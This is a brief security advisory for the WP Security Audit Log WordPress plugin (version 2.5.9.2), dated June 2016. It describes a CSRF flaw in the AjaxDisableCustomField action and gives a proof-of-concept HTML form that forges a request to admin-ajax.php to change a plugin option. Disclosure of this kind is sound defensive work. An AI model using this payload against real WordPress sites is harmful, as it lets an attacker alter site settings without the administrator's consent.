WP Security Audit Log [CSRF → Plugin Options Update ]
Description
An attacker can use the AJAX action AjaxDisableCustomField to update
a specific plugin option. This action is privileged so it takes a
registered user to exploit it.
This action is also vulnerable to CSRF attack.
PoC
<form action="http://sbwp3.dev/wp-admin/admin-ajax.php" method="post">
<input name="action" type="hidden" value="AjaxDisableCustomField" />
<input name="notice" type="hidden" value="my_custom_field-1,my_custom_field-2" />
<input type="submit" value="Click Me!" />
</form>
INFO
- 28 June 2016
- Pan Vag
- www.wpwhitesecurity.com
- wordpress.org
- 2.5.9.2
- WordPress 4.5.2
- DWF-2016-87076